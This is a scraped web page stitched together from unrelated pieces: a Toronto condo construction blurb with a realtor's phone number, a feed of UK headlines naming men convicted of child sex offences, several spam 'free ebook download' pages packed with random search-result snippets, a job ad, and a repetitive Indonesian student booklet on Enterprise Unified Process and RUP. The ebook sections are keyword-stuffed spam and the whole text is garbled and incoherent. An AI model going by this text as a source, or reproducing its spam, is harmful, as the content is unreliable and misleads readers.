With much of Etobicoke's high-rise construction activity clustered near the Lake, the Humber Bay Shores and Lake Shore Boulevard corridor are set to see a wealth of projects completed in 2016. Overlooking Mimico Creek just north of Lake Shore Boulevard, The Times Group's Key West kicks off our coverage in Etobicoke's east end, with the 44-storey Burka Architects-designed tower now in the closing stages of construction. With the building now topped off and 90% of the cladding installed, the project is already shaping up aesthetically, with precast concrete piers emphasizing the vertical amidst the surrounding cluster of towers.

Do you have a favourite community? 

Would you like to live here?  Connect with me at 647 218 2414

          Joseph Greenhow – Sudbury   
June 2017 Suffolk man who downloaded indecent images of children while at work is spared jail A man who viewed …

Continue reading

          Patrick O’Donnell – Westow   
June 2017 Patrick O’Donnell, 73, of Main Street, Westow, jailed for sex assault on girl A 73-YEAR-OLD man who sexually …

Continue reading

          Blyth Stevenson – Kirkcaldy   
June 2017 Man guilty of abusing girl at pool A Kirkcaldy man has been found guilty of sexually abusing a …

Continue reading

          John Fox – Aberdeen   
June 2017 Rapist attacked pregnant woman during abuse campaign A rapist who attacked a pregnant woman during a 20 year …

Continue reading

          Neil Turner – Worthing   
June 2017 Former teacher sentenced over child sex offences A former Worthing teacher has been sent to prison after admitting …

Continue reading

          Michael Gough – Macclesfield   
June 2017 Man avoids prison after being caught with more than 5,000 indecent images A man has avoided prison after …

Continue reading

          Paul Bishop – Long Itchington   
June 2017 Man jailed for grooming and sexually assaulting girl, 14 A man who sexually assaulted a girl he knew …

Continue reading

          Bruno Mamedes – Coventry   
June 2017 Coventry man jailed after trying to claim horrific images of children were downloaded by someone else A TELECOM …

Continue reading

          George Calf – Hackney   
June 2017 Chihuahua paedo jailed again after police find children’s toys at his Hackney home A convicted paedophile who was …

Continue reading

          Download Free Superman Abandons Earth: And Other News They Won't Tell You Ebook PDF Free   

0 - Read/Download Superman Abandons Earth: And Other News They Won't Tell You Ebook Full

Alternative Download Link - Superman Abandons Earth: And Other News They  Won't Tell You

Gratuit Christopher Reeve Wikipedia Life and career Early life. Christopher Reeve was born on September 25, 1952, in New York City, the son of Barbara Pitney (Lamb), a journalist, and Franklin D'Olier ... Superman Super Site.com Superman News Information Covering Superman's creation in 1938 through present day. Categories include comics, movies, television, actors, and Smallville with updates daily. Man of Steel (2013) Rotten Tomatoes Compared to what 'Superman Returns' offered in 2006, 'Man of Steel' come back with a stronger power to drawn the audiences attention by having a well named director ... Superman's Powers and Abilities Superman Wiki Fandom ... As presented in the original 1930's comic strip, Superman's powers were indigenous to those of all Kryptonians. In the origin stories of the comic books and comic ... Uxas (New Earth) DC Database Fandom powered by Wikia This is an in universe article with out of universe material. This article covers information about something that exists within the DC Universe, and should not ... Kara Zor El (New Earth) DC Database Fandom powered by ... History. Kara Zor El, also known as Supergirl and Linda Lang, is a Kryptonian superhero based in Metropolis. She is the cousin of Superman, Lana Lang's foster niece ... Superman Wikipedia Superman is a fictional superhero appearing in American comic books published by DC Comics. The character was created by writer Jerry Siegel and artist Joe Shuster ... Batman v Superman: 44 New Images Go High ... Collider Warner Bros. has released a bevy of high resolution new images from Batman v Superman: Dawn of Justice, featuring a colorful look at Henry Cavill and Ben Affleck. Virgin Media Fibre Broadband, Digital TV, Mobile More ... Fibre broadband, digital TV, landline phone and mobile services from Virgin Media. Order online for the best broadband, cable TV, phone and mobile deals. Superman Wikipdia Superman est un super hros de bande dessine amricaine appartenant au monde imaginaire de lUnivers DC. Ce personnage de fiction est considr comme une ... Comic Book Sci Fi Movie News Heat Vision Hollywood ... Heat Vision focuses on fanboy entertainment news including movies, TV shows and comic books with geek friendly subjects. It's like Comic Con 365 days a year. Superman II (1980) Filmsite.org "Superman" Films Part 2 : Superman II (1980) d. Richard Lester, 127 minutes, 116 minutes Superman II (2006), Richard Donner's cut, with 83% Donner original footage Clark Kent Smallville Wiki Fandom powered by Wikia Clark Kent, aka Superman, is Earth's greatest hero and the main protagonist of Smallville... Superman: The Animated Series (Western Animation) TV Tropes Superman: The Animated Series (or The New Superman Adventures in its second season) is an animated television series than ran from 1996 to 2000 on Kids' WB!. After ... Comics DC DCComics.com: Welcome to the Official Site for DC. DC is home to the "World's Greatest Super Heroes, including SUPERMAN, BATMAN, WONDER WOMAN, GREEN LANTERN, THE ... Chris Coghlan Soars Into Home Plate Like Superman With ... With moves like this, we might have just found the new David Ross for the next season of Dancing with the Stars. Toronto Blue Jays utility man Chris Coghlan had ... Batman v Superman: Dawn of Justice (Film) TV Tropes Batman v. Superman: Dawn of Justice is the 2016 sequel to Man of Steel, directed by Zack Snyder and the second film in the DC Extended Universe. Clark Kent Arrowverse Wiki Fandom powered by Wikia The first photo of Superman. In his secret identity, he began working as a reporter for the Daily Planet, where he met Lois Lane, with whom he fell in love at first ... Men of Steel: 11 Actors Who Have Played Superman Den of Geek Our look at the all the Superman actors who have worn the cape on the big and small screen, from the earliest days to the present. The Most Powerful Mercury Heavy Metal Detox Guide The Optimal Diet for Heavy Metal Detoxification: Sugar Detoxification. Most people with high levels of heavy metals also have a high load of candida (which is also ... DC Welcome to DC The official DC Comics web page. Plenty of information about all their titles. Listen to the Superman radio show. Chat, trivia questions, and an Email newsletter. Superman Returns (2006) IMDb Directed by Bryan Singer. With Brandon Routh, Kevin Spacey, Kate Bosworth, James Marsden. Superman reappears after a long absence, but is challenged by an old foe who ... Superman Movies List: All Films Ranked Worst to Best ... Two THR film critics rank all the Superman films and spinoffs, including a revamped version of the 1980 sequel (featuring more Marlon Brando) and the deliriously ... Superman (1978) IMDb The Internet Movie Database includes plot outline, user comments, ratings, and cast overview. Lascaas: Superman ordered death of political enemies ... MANILA, Philippines They called him Superman. That was the code the Davao Death Squad allegedly gave former Davao City mayor now President Rodrigo ... Read/download Superman Abandons Earth: And Other News They Won't Tell You ebook full free online.

          Read Download The Uncommon Wisdom of Ronald Reagan: A Portrait in His Own Words Ebook Full   

0 - Free The Uncommon Wisdom of Ronald Reagan: A Portrait in His Own Words Ebook Download Full

Alternative Download Link - The Uncommon Wisdom of Ronald Reagan: A Portrait in His Own Words

Gratuit WODs News CrossFit Uncommon CrossFit 1.0 A. Take 15 20 minutes to cycle through and practice various gymnastics elements that you need to work on examples . . . Pistol Progressions x 4 6 ... Enrollment Uncommon Schools Uncommon Schools does not accept high school applications at this time, but you are welcome to submit applications for all other grades, Kindergarten through 8th. Suncoast Vacation Rentals St. George Island, Florida Suncoast Vacation Rentals of St. George Island, LLC Suncoast Realty Property Management, LLC. 224 Franklin Blvd. St. George Island, FL 32328; Local: 850 927 2282 ... What is frontal lobe dementia in the elderly? Reference.com Frontotemporal dementia is the shrinking of the frontal and temporal anterior lobes of the brain, states WebMD. Symptoms may include impulsive or listless behavior ... DiSEqC schakelaars schakelingen DiSEqC schakelaars basis 2a De basisschakelingen (2 soorten DiSEqC schakelaars) Committed schakelaars [C] Schakelt niet alleen relais maar ook de LNs ... United Nations Statistics Division Commodity Trade ... United Nations Comtrade Database ... General disclaimer: The designations employed and the presentation of material on this internet site do not imply the expression ... University of Connecticut Men's Basketball The Official Athletic Site of the University of Connecticut Men's Basketball, partner of CBS Sports Digital. The most comprehensive coverage of the University of ... Uncommon Schools Uncommon Schools is a network of public, charter schools in New York, New Jersey, and Massachusetts. https: www.traffilog.com appv2 Home UConn Early College Experience 6 24 CWP 35th Anniversary; 6 27 UConn Early College Experience English Summer Institute ; 6 28 UConn Early College Experience English Summer Institute Mobilieji telefonai TELE2 populiariausias mobiliojo ... Mano TELE2. Tel. numeris. +370 Psychology Self Help Forum Uncommon Knowledge Discuss psychology, get help, give help, chat with other practitioners come and join the community at Uncommon Knowledge's Forum. Health Issues David Suzuki Foundation Environmental hazards can cause health problems, which is why we work to prevent pollutants and toxics from entering our bodies and our environment. Uncommon Seed, Uncommon Harvest Sow Your Uncommon Seed Now The Lord will guide you continually, and satisfy your soul in drought, and strengthen your bones... Telescoping Flagpoles, Flagpoles Flags By Uncommon USA Telescoping flagpoles and flags of states, countries, armed forces and sport teams. What are the symptoms of frontal lobe dementia ... Symptoms of frontotemporal, or frontal lobe, dementia fall into three dominant symptom clusters: behavioral changes, speech and language changes, and movement ... pokemon lot eBay Find great deals on eBay for pokemon lot and pokemon game lot. Shop with confidence. Walkerden Golf Wholesale distributor of quality golf ... Walkerden Golf Wholesale distributor of quality golf products and custom promotional merchandise based in Sydney, Australia Rain Covers Sunsleeves Softspikes Gogie ... Home Uncommon Ground uncommon ground operates 2 independently owned restaurants located in Chicago. The first, located in the Lakeview Wrigleyville neighborhood, opened in 1991. Unique Gifts, Jewelry, Home Decor More UncommonGoods Find cool and unusual gifts for any occasion at UncommonGoods. We have thousands of creative gift ideas for men, women, and kids of all ages. pokemon card lot eBay Find great deals on eBay for pokemon card lot and pokemon card lot 1000. Shop with confidence. Uncommon Valor (1983) IMDb Directed by Ted Kotcheff. With Gene Hackman, Patrick Swayze, Robert Stack, Fred Ward. Ten years after his son went MIA in Vietnam, U.S.Marine retired Colonel Jason ... Funky Gifts, Clever Gifts, Cute Gifts, Art ... UncommonGoods Find funky gifts in our selection of smartly designed art gifts at UncommonGoods. We carry cute gifts for the mushy and clever gifts for the logical brainiacs. Read/download The Uncommon Wisdom of Ronald Reagan: A Portrait in His Own Words ebook full free online.

          Read Download Notes on Democracy (Large Print Edition) Ebook Full   

0 - Download Notes on Democracy (Large Print Edition) Ebook Free Online

Alternative Download Link - Notes on Democracy (Large Print Edition)

Gratuit Food Ideas, Recipe Nutrition Facts SELF Find the best recipe ideas, videos, healthy eating advice and cooking techniques from our experts, all on SELF. Atmel AVR 8 bit and 32 bit Microcontrollers Atmel AVR 8 bit and 32 bit microcontrollers deliver a unique combination of performance, power efficiency, and design flexibility for a wide range of applications. CBSE Class 9 10 Editing Exercise 2 blogspot.com Blog provides NCERT solutions, CBSE, NTSE, Olympiad study material, model test papers, important Questions and Answers asked in CBSE examinations. Airfoil Comparison Airfoil Comparison. Select airfoils from the airfoil database or add your own airfoils and compare the airfoil shape and lift drag polars. Fallout 4 holodisks and notes Fallout Wiki Fandom ... This page lists all holodisks and notes in Fallout 4. The content is not described in full detail on this page. For details, please see the respective articles. Linear Technology Application Notes Application Notes. To search our Application Notes, either browse the list below or type a Keyword or Part Number into our search box at the top right of this page. 3 people fired by Trump were all investigating ... Axios Join AXIOS to save stories for later, get personalized news, and more! Detroit Tigers notes: News is good for injured trio Tigers manager Brad Ausmus received some encouraging news about a couple players on the disabled list. J.D. Martinez, who has been on the disabled list since the ... The Rise of American Industry [ushistory.org] Some have called Sam Slater's mill the birthplace of the American Industrial Revolution. During the first 30 years of the 1800s, American Industry was truly born ... Global Positioning System Overview These materials were developed by Peter H. Dana, Department of Geography, University of Texas at Austin, 1994. These materials may be used for study, research, and ... Mike Millss Anti Hollywood Family Films The New Yorker Mike Millss Anti Hollywood Family Films In 20th Century Women, the director of Beginners reimagines his complex relationship with his mother. IBM Collaboration Solutions Lotus Software IBM Collaboration Solutions, formerly known as IBM Lotus Software, delivers business collaboration software through enterprise social and mail solutions. Passive voice English Grammar Guide EF Functions of the passive voice The passive voice is used to show interest in the person or object that experiences an action rather than the person or object that ... 40th Anniversary Tour Announced! TomPetty.com News Tom and the Heartbreakers are pleased to announce the first dates of their 40th Anniversary Tour. Tom announced the tour on The Tonight Show Starring Jimmy Fallon ... Java SE 6 Update 12 Release Notes. Oracle The full internal version number for this update release is 1.6.0_12 b04 (where "b" means "build"). The external version number is 6u12. This release contains Olson ... VueScan 9 Release Notes VueScan supports raw scan files for the digital cameras in the following list. However, note that the colors may will be more accurate if you use an IT8 camera target ... Study Guides and Strategies Welcome to the Study Guides and Strategies Website! Helpful hint: with print preview and print, all navigation, banners and ads are deleted; only the helpful content ... ASP.NET MVC 4 Microsoft Docs This document describes the release of ASP.NET MVC 4 . ASP.NET MVC 4 for Visual Studio 2010 can be installed from the ASP.NET MVC 4 home page using the Web Platform ... The Mesentery: The Human Body's 79th Organ? D brief Editors note: For a deeper exploration of the mesentery including if it should actually be called our 79th organ click here. To the 78 ... 2014 Chevrolet Camaro 2SS Coupe review notes Autoweek 2 of 7 The 2014 Chevrolet Camaro 2SS Coupe is equipped with a 6.2 liter V8, pushing out 426 hp with 420 lb ft of torque. VirtualDub 1.10.4 released virtualdub.org "my work on VirtualDub has been very slow, which I apologize for, but I'd like to thank everyone" We thank you, sir. I've been using VirtualDub for ten years and I ... Recording Technology History Audio Engineering Society 1907 The Dictaphone Corporation was organized when the Columbia Graphophone Co. sold its business machine division. 1908 John Lomax, on his first trip west ... Lecture Notes in Computer Science Springer The series Lecture Notes in Computer Science (LNCS), including its subseries Lecture Notes in Artificial Intelligence (LNAI) and Lecture Notes in Bioinformatics (LNBI ... Aaron Hernandez Notes: Wrote Incoherent Suicide Letter ... Aaron Hernandez Notes: Wrote Incoherent Suicide Letter To Rumored Gay Lover Kyle Kennedy? Java SE Development Kit 8, Update 101 Release Notes Release Notes for the Java SE Development Kit 8u101 release. Lipedema Karen L. Herbst, Ph.D., M.D. Lipedema is a classically thought of as a congenital fatty enlargement of the legs almost exclusively seen in women by the third decade; two cases have been reported ... Solved MCQs Notes for Preparation of NTS Tests National Testing Service of Pakistan Preparation Notes,MCQs and Material for various posts,Past Papers 2016 2017,General Knowledge,English,Pakistan Studies,Islamic ... Visual Studio 2017 Release Notes Release Date: June 9, 2017 Visual Studio 2017 version 15.2 (26430.13) Issues Fixed in this Release. These are the customer reported issues addressed in this version: I Love Lotus Notes After realising that a lot of people are ill informed about Lotus Notes Domino and its capabilities, I have established this blog (built on Lotus Notes!). 20+ Of The Funniest Notes From Moms And Dads Bored Panda Keep on scrolling to take a look at a list of hilarious notes that parents left for their kids compiled by Bored Panda. They're bound to make you laugh, or at least ... Read/download Notes on Democracy (Large Print Edition) ebook full free online.

          Administrative Assistant - Customer Care - Starr Commonwealth - Albion, MI   
Provide administrative support to all central administration and advancement functions including data entry, spreadsheet and database work, filing, typing, word...
From Starr Commonwealth - Thu, 13 Apr 2017 14:23:12 GMT - View all Albion, MI jobs



1.1 Latar Belakang

Enterprise Unified Process (EUP) adalah perpanjangan varian dari Rasional Unified Proses dan dikembangkan oleh Scott W. Ambler dan Larry Constantine pada tahun 2000, terakhir dikerjakan ulang pada tahun 2005 oleh Ambler, John Nalbone dan Michael Vizdos. EUP diperkenalkan untuk mengatasi beberapa kekurangan dari RUP, yaitu kurangnya dukungan sistem dan akhir penggunaan sistem software. Jadi dua fase dan beberapa disiplin ilmu baru ditambahkan ke RUP.

1.2 Tujuan

Tujuan pelaksanaan ini adalah untuk memberikan panduan pembelajaran bagaimana, EUP merupakan implementasikan dalam suatu pengembangan perangkat lunak

1.3 Ruang Lingkup

Pengembangan aplikasi intranet potal dilakukan menggunakan metodologi Enterprise Unified Process (EUP) dengan menggunakan perangkat lunak Rational Enterprise Suite. Perangkat bantu yang digunakan adlah Rational Requisite Pro untuk menemukan dan mendokumentasikan kebuuhan user terhadap aplikasi yang akan dikembangkan dan Rational Rose untuk melakukan pengembangan kerangka aplikasi
Dalam implementasi akan dikembangkan aplikasi intranet protal untuk fullright indonesia sebagai model dan studi kasus dengan menggunakan RUP dalam proses pengembangan aplikasi, Adapu ruang lingkup pengembang Aplikasi intranet portal mencakup hal-hal sebagai :
  • Pengembangan spesifikasi dan moldul aplikasi antar muka (interface) yang menjadi penghubung antar pengguna dengan infrastruktur dan sumber daya yang dimiliki Fulbright Indonesia.
  • Pengembangan spesifikasi dan modul aplikasi perangkat bantu (tools) yang dapat diintegrasikan ke sistem seperti yang diperlukan oleh sistem.
  • Pengembangan spesifikasi database yang diperlukan oleh sistem.



Enterprise Unified Process

2.1 Pengertian Enterprise Unified Process

Enterprise Unified Process (EUP) adalah perpanjangan varian dari Rasional Unified Proses dan dikembangkan oleh Scott W. Ambler dan Larry Constantine pada tahun 2000, terakhir dikerjakan ulang pada tahun 2005 oleh Ambler, John Nalbone dan Michael Vizdos.EUP diperkenalkan untuk mengatasi beberapa kekurangan dari RUP, yaitu kurangnya dukungan sistem dan akhir penggunaan sistem software. Jadi dua fase dan beberapa disiplin ilmu baru ditambahkan ke RUP. EUP melihat pengembangan perangkat lunak bukan sebagai kegiatan mandiri, tetapi tertanam dalam siklus hidup sistem (yang akan dibangun atau ditingkatkan atau diganti), Siklus hidup TI dari perusahaan dan organziation/bisnis adlah siklus hidup perusahaan itu sendiri. Ini berkaitan dengan pengembangan perangkat lunak dilihat dari sudut pandang pelanggan.

2.2 Penurunan pada Enterprise Unified Process

2.2.1 Pengertian Rational Unified Process

Rational Unified Process (RUP) merupakan suatu metode rekayasa perangkat lunak yang dikembangkan dengan mengumpulkan berbagai best practises yang terdapat dalam industri pengembangan perangkat lunak. Ciri utama metode ini adalah menggunakan use-case driven dan pendekatan iteratif untuk siklus pengembangan perankat lunak. Gambar dibawah menunjukkan secara keseluruhan arsitektur yang dimiliki RUP. RUP menggunakan konsep object oriented, dengan aktifitas yang berfokus pada pengembangan model dengan menggunakan Unified Model Language (UML). Melalui gambar dibawah dapat dilihat bahwa RUP memiliki, yaitu:
  • Dimensi pertama digambarkan secara horizontal. Dimensi ini mewakili aspek-aspek dinamis dari pengembangan perangkat lunak. Aspek ini dijabarkan dalam tahapan pengembangan atau fase. Setiap fase akan memiliki suatu major milestone yang menandakan akhir dari awal dari phase selanjutnya. Setiap phase dapat berdiri dari satu beberapa iterasi. Dimensi ini terdiri atas Inception, Elaboration, Construction, dan Transition.
  • Dimensi kedua digambarkan secara vertikal. Dimensi ini mewakili aspek-aspek statis dari proses pengembangan perangkat lunak yang dikelompokkan ke dalam beberapa disiplin. Proses pengembangan perangkat lunak yang dijelaskan kedalam beberapa disiplin terdiri dari empat elemen penting, yakni who is doing, what, how dan when. Dimensi ini terdiri atas
Business Modeling, Requirement, Analysis and Design, Implementation, Test, Deployment, Configuration dan Change Manegement, Project Management, Environtment. 

Enterprise Unified Process

Adhy Suryo Wicaksono
Bayu Akbar
Fachri Adityo
Fajar Hidayatullah



Kata Pengantar

Puji dan syukur kami panjatkan ke Hadirat Tuhan Yang Maha Esa, karena berkat limpahan Rahmat dan Karunia-Nya sehingga kami dapat menyusun buku ini dengan baik, serta tepat pada waktunya. Dalam buku ini kami akan membahas mengenai “ENTERPRISE UNIFIED PROCESS”
Buku ini telah dibuat dengan berbagai observasi, pencarian materi dan beberapa bantuan dari berbagai pihak untuk membantu menyelesaikan buku ini. Oleh karena itu, kami mengucapkan terimak kasih kepada semua pihak yang telah membantu dalam penyusunan buku ini.
Kami menyadari bahwa masih banyak kekurangan yang mendasar pada buku ini. Oleh karena itu kami mengundang pembaca untuk memberikan saran serta kritik yang dapat membangun kami. Kritik konstruktif dari pembaca sangat kami harapkan untuk penyempurnaan buku selanjutnya.
Akhir kata semoga buku ini dapat memberikan manfaat terhadap kita semua.
Daftar Isi 

Kata Pengantar
Bab 1. Pendahuluan
       1.1   Latar Belakang
       1.2   Tujuan
       1.3   Ruang Lingkup
Bagian II
Bab 2. Konsep Enterprise Unified Process
       2.1    Pengertian Enterprise Unified Process
       2.2    Penurunan pada Enterprise Unified Process
       2.2.1 Pengertian Rational Unified Process
       2.2.2 Sejarah Rational Unified Process
       2.2.3 Keuntungan Rational Unified Process
Bagian III
Bab 3
       3.1    Fase-fase Enterprise Unified Process 
       3.1.1 Inception
       3.1.2 Elaboration
       3.1.3 Construction
       3.1.4 Transition
       3.1.5 Production
       3.1.6 Retirement
       3.2    Praktik-praktik Enterprise Unified Process
Bagian IV
Bab 4 Contoh kasus fase-fase Enterprise Unified Process SMS Gateway
       4.1    Inception
       4.2    Elaboration
       4.3    Construction
       4.4    Transition
       4.5    Production
       4.6    Retirement
Bab 5 Penutup 
       5.1    Kesimpulan



1.1 Latar Belakang
 Enterprise Unified Process (EUP) adalah perpanjangan varian dari Rasional Unified Proses dan dikembangkan oleh Scott W. Ambler dan Larry Constantine pada tahun 2000, terakhir dikerjakan ulang pada tahun 2005 oleh Ambler, John Nalbone dan Michael Vizdos. EUP diperkenalkan untuk mengatasi beberapa kekurangan dari RUP, yaitu kurangnya dukungan sistem dan akhir penggunaan sistem software. Jadi dua fase dan beberapa disiplin ilmu baru ditambahkan ke RUP.

1.2 Tujuan
Tujuan pelaksanaan ini adalah untuk memberikan panduan pembelajaran bagaimana, EUP merupakan implementasikan dalam suatu pengembangan perangkat lunak

1.3 Ruang Lingkup
Pengembangan aplikasi intranet potal dilakukan menggunakan metodologi Enterprise Unified Process (EUP) dengan menggunakan perangkat lunak Rational Enterprise Suite. Perangkat bantu yang digunakan adlah Rational Requisite Pro untuk menemukan dan mendokumentasikan kebuuhan user terhadap aplikasi yang akan dikembangkan dan Rational Rose untuk melakukan pengembangan kerangka aplikasi
Dalam implementasi akan dikembangkan aplikasi intranet protal untuk fullright indonesia sebagai model dan studi kasus dengan menggunakan RUP dalam proses pengembangan aplikasi, Adapu ruang lingkup pengembang Aplikasi intranet portal mencakup hal-hal sebagai :
  • Pengembangan spesifikasi dan moldul aplikasi antar muka (interface) yang menjadi penghubung antar pengguna dengan infrastruktur dan sumber daya yang dimiliki Fulbright Indonesia.
  • Pengembangan spesifikasi dan modul aplikasi perangkat bantu (tools) yang dapat diintegrasikan ke sistem seperti yang diperlukan oleh sistem.
  • Pengembangan spesifikasi database yang diperlukan oleh sistem.

BAB 2 


Enterprise Unified Process

2.1 Pengertian Enterprise Unified Process
Enterprise Unified Process (EUP) adalah perpanjangan varian dari Rasional Unified Proses dan dikembangkan oleh Scott W. Ambler dan Larry Constantine pada tahun 2000, terakhir dikerjakan ulang pada tahun 2005 oleh Ambler, John Nalbone dan Michael Vizdos.EUP diperkenalkan untuk mengatasi beberapa kekurangan dari RUP, yaitu kurangnya dukungan sistem dan akhir penggunaan sistem software. Jadi dua fase dan beberapa disiplin ilmu baru ditambahkan ke RUP. EUP melihat pengembangan perangkat lunak bukan sebagai kegiatan mandiri, tetapi tertanam dalam siklus hidup sistem (yang akan dibangun atau ditingkatkan atau diganti), Siklus hidup TI dari perusahaan dan organziation/bisnis adlah siklus hidup perusahaan itu sendiri. Ini berkaitan dengan pengembangan perangkat lunak dilihat dari sudut pandang pelanggan.
2.2 Penurunan pada Enterprise Unified Process

2.2.1 Pengertian Rational Unified Process
Rational Unified Process (RUP) merupakan suatu metode rekayasa perangkat lunak yang dikembangkan dengan mengumpulkan berbagai best practises yang terdapat dalam industri pengembangan perangkat lunak. Ciri utama metode ini adalah menggunakan use-case driven dan pendekatan iteratif untuk siklus pengembangan perankat lunak. Gambar dibawah menunjukkan secara keseluruhan arsitektur yang dimiliki RUP. RUP menggunakan konsep object oriented, dengan aktifitas yang berfokus pada pengembangan model dengan menggunakan Unified Model Language (UML). Melalui gambar dibawah dapat dilihat bahwa RUP memiliki, yaitu:
  • Dimensi pertama digambarkan secara horizontal. Dimensi ini mewakili aspek-aspek dinamis dari pengembangan perangkat lunak. Aspek ini dijabarkan dalam tahapan pengembangan atau fase. Setiap fase akan memiliki suatu major milestone yang menandakan akhir dari awal dari phase selanjutnya. Setiap phase dapat berdiri dari satu beberapa iterasi. Dimensi ini terdiri atas Inception, Elaboration, Construction, dan Transition.
  • Dimensi kedua digambarkan secara vertikal. Dimensi ini mewakili aspek-aspek statis dari proses pengembangan perangkat lunak yang dikelompokkan ke dalam beberapa disiplin. Proses pengembangan perangkat lunak yang dijelaskan kedalam beberapa disiplin terdiri dari empat elemen penting, yakni who is doing, what, how dan when. Dimensi ini terdiri atas
Business Modeling, Requirement, Analysis and Design, Implementation, Test, Deployment, Configuration dan Change Manegement, Project Management, Environtment.

Pada penggunaan kedua standard tersebut diatas yang berorientasi obyek (object orinted) memiliki manfaat yakni:
  • Improve productivity Standard ini dapat memanfaatkan kembali komponen-komponen yang telah tersedia/dibuat sehingga dapat meningkatkan produktifitas
  • Deliver high quality system Kualitas sistem informasi dapat ditingkatkan sebagai sistem yang dibuat pada komponen¬komponen yang telah teruji (well-tested dan well-proven) sehingga dapat mempercepat delivery sistem informasi yang dibuat dengan kualitas yang tinggi.
  • Lower maintenance cost Standard ini dapat membantu untuk menyakinkan dampak perubahan yang terlokalisasi dan masalah dapat dengan mudah terdeteksi sehingga hasilnya biaya pemeliharaan dapat dioptimalkan atau lebih rendah dengan pengembangan informasi tanpa standard yang jelas.
  • Facilitate reuse Standard ini memiliki kemampuan yang mengembangkan komponen-komponen yang dapat digunakan kembali untuk pengembangan aplikasi yang lainnya.
  • Manage complexity Standard ini mudah untuk mengatur dan memonitor semua proses dari semua tahapan yang ada sehingga suatu pengembangan sistem informasi yang amat kompleks dapat dilakukan dengan aman dan sesuai dengan harapan semua manajer proyek IT/IS yakni deliver good quality software within cost and schedule time and the users accepted.
Dari gambar diatas, terlihat ada sembilan core process workflow dalam RUP. Semuanya merepresentasikan pembagian worker dan activities ke dalam logical grouping. Ada dua bagian utama yaitu process workflows dan supporting workflows. Dalam process workflows terdapat Bussiness modeling yang didalamnya dibuat dokumen bussiness process yang dipakai disebut bussiness use cases. Dokumen ini menjamin stakeholder memahami kebutuhan bisnis proses yang diperlukan.
Tujuan dari requirement workflow adalah mendeskripsikan ‘what’/apa yang harus dikerjakan oleh sistem serta membolehkan developer dan costumer untuk menyetujui deskripsi itu. Analysis&Design workflows bertujuan untuk menunjukkan ‘how/bagaimana merealisasikan sistem dalam tahap implementasi. Didalamnya kita akan menemukan problem domain juga solusi dari problem yang mungkin akan muncul dalam sistem. Hasil yang diberikan pada tahapan ini adalah design model sebagai ‘blueprint’ dari source code yang akan dibuat dan juga analysis model (optional). Implementation workflow bertujuan untuk mengimplementasikan classes dan objects dalam hubungannya dengan component, mengetest component yang dihasilkan sebagai unit, dan untuk mengintegrasikan hasil yang dibuat oleh masing-masing implementer/teams ke dalam executable system. RUP menjelaskan bagaimana kita me-reuse exiting complements atau me-implement new component sehingga membuat sistem mudah dibangun dan meningkatkan kemungkinan untuk me-reusenya. Test workflow bertujuan untuk memeriksa interaksi antar objek, penggabungan component dari software dengan tepat, dan memeriksa apakah semua kebutuhan sudah dipenuhi dengan tepat. Selain itu, test bertujuan untuk mengidentifikasikan dan meyakinkan bahwa kerusakan yang ada telah diatasi sebelum men-deploy software.
RUP menawarkan pendekatan iterative yang memungkinkan kita mengetest keseluruhan project dengan menemukan kerusakan sejak dini sehingga mengurangi cost untuk memperbaikinya. Test menghasilkan tiga macam ukuran qualitas yaitu reliability, functionality, application dan system performance. Deployment workflow dilakukan untuk menghasilkan product release dengan sukses dan aktifitas mengantar software kepada end user seperti membuat external releases dari software ,packing software, distributing software, installing software, serta membantu user memahami sistem. Aktifitas ini dilakukan pada fase transition. Dalam RUP, deployment workflow berisi paling sedikit detailnya daripada workflow yang lain. Project management menyediakan framework untuk mengatur software-intensive projects, panduan untuk planning, staffing, executing, dan monitoring projects, dan framework untuk mengatur resiko yang ada. Dikatakan sukses apabila produk tersebut dapat memenuhi kebutuhan user dan kebanyakan customer.
Configuration and change management menyediakan panduan untuk mengatur penyusunan software systems, mengatasi perubahan request management, dan dapat menjadi salah satu cara untuk melaporkan suatu kerusakan. Environment bertujuan menyediakan software development organization beserta software development environment, yang dibutuhkan untuk mendukung development team. Seperti yang kita tahu dalam software development, tujuan yang akan diraih adalah membangun/meningkatkan sebuah software sesuai dengan kebutuhan (Bussiness Process). Sedangkan sebuah proses disebut efektif jika menetapkan sebuah garis pedoman yang menjamin kualitas software yang dibangun, mengurangi resiko dan meningkatkan perkiraan kepada masalah yang mungkin muncul, serta menggunakan best practise. Rational Unified Process menawarkan dan menjelaskan penerapan six best practise yang efektif pada software development, diantaranya adalah :
  • Develop Software Iteratively Pendekatan secara iterative digunakan untuk mengurangi resiko yang dapat terjadi selama lifecycle. Setiap akhir iterasi akan diperoleh executable release yang memungkinkan keterlibatan end user dan feedback yang diberikan secara terus-menerus. Pendekatan ini juga mepermudahkan penyesuaian perubahan kebutuhan, features, maupun jadwalnya.
  • Manage Requirements Rational Unified Process mendeskripsikan bagaimana mendapatkan, mengorganisasikan, dan mendokumentasikan fungsionalitas dan batasan yang dibutuhkan. Sehingga akan memudahkan dalam memahami dan mengkomunikasikan kebutuhan bisnis.
  • Use Component-based Architecture RUP menggunakan pendekatan sistematis dalam mendefinisikan arsitektur yang menggunakan component. Karena memang proses yang dilakukan difokuskan pada awal pembangunan sebuah software. Dalam proses ini akan mendeskripsikan bagaimana menyusun arsitektur yang fleksibel, mudah dipahami, dan mengembangkan efektif software reuse.
  • Visually Model Software Proses yang dilakukan menunjukkan bagaimana memvisualisasikan model yang mencakup struktur dan kelakuan dari arsitektur dan komponen.
  • Verify Software Quality Application perfoemance dan kemampuan tahan uji yang buruk dapat menghalangi diterimanya sebuah aplikasi software. Sehingga diperlukan penelaahan lebih lanjut tentang kualitas software dengan mematuhi kebutuhan aplikasi berdasarkan kemampuan tahan uji, fungsionalitas, application performance, dan system performance.
  • Control Changes to Software Proses akan mendeskripsikan bagaimana mengontrol dan memonitor perubahan untuk kesuksesan iterative development. Selain itu, proses juga akan memandu kita bagaimana menyusun workspace yang aman bagi para developer dengan mengisolasi perubahan yang dilakukan di workspace lain dan dengan mengontrol perubahan pada seluruh software artifact. Sehingga membuat team bekerja sebagai unit tersendiri dengan mendeskripsikan bagaimana mengintegrasikan dan membangun management secara otomatis.
